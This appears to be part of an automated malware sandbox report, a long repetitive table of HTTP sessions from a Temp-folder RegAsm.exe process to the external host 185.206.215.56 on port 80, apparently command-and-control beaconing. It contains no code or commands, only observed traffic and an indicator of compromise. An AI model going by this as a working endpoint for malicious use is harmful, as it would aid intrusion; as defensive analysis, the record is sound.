Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:15.552401066 CET | 1169 | OUT | |
Jan 5, 2021 19:06:15.734059095 CET | 1170 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
22 | 192.168.2.22 | 49189 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:15.960354090 CET | 1170 | OUT | |
Jan 5, 2021 19:06:16.139384985 CET | 1171 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
23 | 192.168.2.22 | 49190 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:16.358508110 CET | 1172 | OUT | |
Jan 5, 2021 19:06:16.531882048 CET | 1172 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
24 | 192.168.2.22 | 49191 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:16.795878887 CET | 1173 | OUT | |
Jan 5, 2021 19:06:16.967212915 CET | 1174 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
25 | 192.168.2.22 | 49192 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:17.183871031 CET | 1174 | OUT | |
Jan 5, 2021 19:06:17.344388008 CET | 1175 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
26 | 192.168.2.22 | 49193 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:17.566776991 CET | 1176 | OUT | |
Jan 5, 2021 19:06:17.726876020 CET | 1176 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
27 | 192.168.2.22 | 49194 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:17.949146032 CET | 1177 | OUT | |
Jan 5, 2021 19:06:18.134409904 CET | 1178 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
28 | 192.168.2.22 | 49195 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:18.364453077 CET | 1178 | OUT | |
Jan 5, 2021 19:06:18.531193972 CET | 1179 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
29 | 192.168.2.22 | 49196 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:18.788238049 CET | 1180 | OUT | |
Jan 5, 2021 19:06:18.959882975 CET | 1180 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49170 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:08.473301888 CET | 1145 | OUT | |
Jan 5, 2021 19:06:08.645122051 CET | 1146 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
30 | 192.168.2.22 | 49197 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:19.176156998 CET | 1181 | OUT | |
Jan 5, 2021 19:06:19.341244936 CET | 1182 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
31 | 192.168.2.22 | 49198 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:19.576040030 CET | 1182 | OUT | |
Jan 5, 2021 19:06:19.751715899 CET | 1183 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
32 | 192.168.2.22 | 49199 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:19.958724022 CET | 1184 | OUT | |
Jan 5, 2021 19:06:20.125689983 CET | 1184 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
33 | 192.168.2.22 | 49200 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:20.390921116 CET | 1185 | OUT | |
Jan 5, 2021 19:06:20.569029093 CET | 1186 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
34 | 192.168.2.22 | 49201 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:20.950520992 CET | 1186 | OUT | |
Jan 5, 2021 19:06:21.111865044 CET | 1187 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
35 | 192.168.2.22 | 49202 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:21.679579973 CET | 1188 | OUT | |
Jan 5, 2021 19:06:21.837781906 CET | 1188 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
36 | 192.168.2.22 | 49203 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:22.303822041 CET | 1189 | OUT | |
Jan 5, 2021 19:06:22.484252930 CET | 1190 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
37 | 192.168.2.22 | 49204 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:22.694391966 CET | 1190 | OUT | |
Jan 5, 2021 19:06:22.877247095 CET | 1191 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
38 | 192.168.2.22 | 49205 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:23.094146967 CET | 1192 | OUT | |
Jan 5, 2021 19:06:23.267446041 CET | 1192 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
39 | 192.168.2.22 | 49206 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:23.470458031 CET | 1193 | OUT | |
Jan 5, 2021 19:06:23.640826941 CET | 1194 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49171 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:08.887025118 CET | 1147 | OUT | |
Jan 5, 2021 19:06:09.065680027 CET | 1147 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
40 | 192.168.2.22 | 49207 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:23.862730026 CET | 1194 | OUT | |
Jan 5, 2021 19:06:24.026554108 CET | 1195 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
41 | 192.168.2.22 | 49208 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:24.246260881 CET | 1196 | OUT | |
Jan 5, 2021 19:06:24.440570116 CET | 1196 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
42 | 192.168.2.22 | 49209 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:24.648293972 CET | 1197 | OUT | |
Jan 5, 2021 19:06:24.816570997 CET | 1197 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
43 | 192.168.2.22 | 49210 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:25.024326086 CET | 1198 | OUT | |
Jan 5, 2021 19:06:25.203072071 CET | 1199 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
44 | 192.168.2.22 | 49211 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:25.428992033 CET | 1199 | OUT | |
Jan 5, 2021 19:06:25.591475010 CET | 1200 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
45 | 192.168.2.22 | 49212 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:25.813759089 CET | 1201 | OUT | |
Jan 5, 2021 19:06:25.992160082 CET | 1201 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
46 | 192.168.2.22 | 49213 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:26.197896004 CET | 1202 | OUT | |
Jan 5, 2021 19:06:26.381041050 CET | 1203 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
47 | 192.168.2.22 | 49214 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:26.599441051 CET | 1203 | OUT | |
Jan 5, 2021 19:06:26.766199112 CET | 1204 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
48 | 192.168.2.22 | 49215 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:26.971787930 CET | 1205 | OUT | |
Jan 5, 2021 19:06:27.131364107 CET | 1205 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
49 | 192.168.2.22 | 49216 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:27.359759092 CET | 1206 | OUT | |
Jan 5, 2021 19:06:27.547158957 CET | 1207 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49172 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:09.279376030 CET | 1148 | OUT | |
Jan 5, 2021 19:06:09.462393999 CET | 1149 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
50 | 192.168.2.22 | 49217 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:27.753619909 CET | 1207 | OUT | |
Jan 5, 2021 19:06:27.916227102 CET | 1208 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
51 | 192.168.2.22 | 49218 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:28.127708912 CET | 1209 | OUT | |
Jan 5, 2021 19:06:28.287151098 CET | 1209 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
52 | 192.168.2.22 | 49219 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:28.505440950 CET | 1210 | OUT | |
Jan 5, 2021 19:06:28.661950111 CET | 1211 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
53 | 192.168.2.22 | 49220 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:28.880701065 CET | 1211 | OUT | |
Jan 5, 2021 19:06:29.048592091 CET | 1212 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
54 | 192.168.2.22 | 49221 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:29.244494915 CET | 1213 | OUT | |
Jan 5, 2021 19:06:29.409620047 CET | 1213 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
55 | 192.168.2.22 | 49222 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:29.630363941 CET | 1214 | OUT | |
Jan 5, 2021 19:06:29.797473907 CET | 1215 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
56 | 192.168.2.22 | 49223 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:30.014888048 CET | 1215 | OUT | |
Jan 5, 2021 19:06:30.193197012 CET | 1216 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
57 | 192.168.2.22 | 49224 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:30.409914970 CET | 1217 | OUT | |
Jan 5, 2021 19:06:30.572042942 CET | 1217 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
58 | 192.168.2.22 | 49225 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:30.786520004 CET | 1218 | OUT | |
Jan 5, 2021 19:06:30.947633028 CET | 1219 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
59 | 192.168.2.22 | 49226 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:31.159641027 CET | 1219 | OUT | |
Jan 5, 2021 19:06:31.319802046 CET | 1220 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49173 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:09.669670105 CET | 1149 | OUT | |
Jan 5, 2021 19:06:09.843837023 CET | 1150 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
60 | 192.168.2.22 | 49227 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:31.542985916 CET | 1221 | OUT | |
Jan 5, 2021 19:06:31.697483063 CET | 1221 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
61 | 192.168.2.22 | 49228 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:31.903232098 CET | 1222 | OUT | |
Jan 5, 2021 19:06:32.053069115 CET | 1223 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
62 | 192.168.2.22 | 49229 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:32.262785912 CET | 1223 | OUT | |
Jan 5, 2021 19:06:32.426687956 CET | 1224 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
63 | 192.168.2.22 | 49230 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:32.647726059 CET | 1225 | OUT | |
Jan 5, 2021 19:06:32.815516949 CET | 1225 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
64 | 192.168.2.22 | 49231 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:33.031393051 CET | 1226 | OUT | |
Jan 5, 2021 19:06:33.190809965 CET | 1226 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
65 | 192.168.2.22 | 49232 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:33.398943901 CET | 1227 | OUT | |
Jan 5, 2021 19:06:33.560619116 CET | 1228 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
66 | 192.168.2.22 | 49233 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:33.770155907 CET | 1229 | OUT | |
Jan 5, 2021 19:06:33.939742088 CET | 1229 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
67 | 192.168.2.22 | 49234 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:34.165365934 CET | 1230 | OUT | |
Jan 5, 2021 19:06:34.334827900 CET | 1230 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
68 | 192.168.2.22 | 49235 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:34.564013004 CET | 1231 | OUT | |
Jan 5, 2021 19:06:34.721364021 CET | 1232 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
69 | 192.168.2.22 | 49236 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:34.935154915 CET | 1232 | OUT | |
Jan 5, 2021 19:06:35.122327089 CET | 1233 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49174 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:10.067265987 CET | 1151 | OUT | |
Jan 5, 2021 19:06:10.236854076 CET | 1151 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
70 | 192.168.2.22 | 49237 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:35.342015982 CET | 1234 | OUT | |
Jan 5, 2021 19:06:35.512182951 CET | 1234 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
71 | 192.168.2.22 | 49238 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:35.726449013 CET | 1235 | OUT | |
Jan 5, 2021 19:06:35.894052029 CET | 1236 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
72 | 192.168.2.22 | 49239 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
73 | 192.168.2.22 | 49240 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
74 | 192.168.2.22 | 49241 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
75 | 192.168.2.22 | 49242 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
76 | 192.168.2.22 | 49243 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
77 | 192.168.2.22 | 49244 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
78 | 192.168.2.22 | 49245 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
79 | 192.168.2.22 | 49246 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49175 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:10.499610901 CET | 1152 | OUT | |
Jan 5, 2021 19:06:10.673142910 CET | 1153 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
80 | 192.168.2.22 | 49247 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
81 | 192.168.2.22 | 49248 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
82 | 192.168.2.22 | 49249 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
83 | 192.168.2.22 | 49250 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
84 | 192.168.2.22 | 49251 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
85 | 192.168.2.22 | 49252 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
86 | 192.168.2.22 | 49253 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
87 | 192.168.2.22 | 49254 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
88 | 192.168.2.22 | 49255 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
89 | 192.168.2.22 | 49256 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49176 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:10.888135910 CET | 1153 | OUT | |
Jan 5, 2021 19:06:11.065620899 CET | 1154 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
90 | 192.168.2.22 | 49257 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
91 | 192.168.2.22 | 49258 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
92 | 192.168.2.22 | 49259 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
93 | 192.168.2.22 | 49260 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
94 | 192.168.2.22 | 49261 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
95 | 192.168.2.22 | 49262 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
96 | 192.168.2.22 | 49263 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
97 | 192.168.2.22 | 49264 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
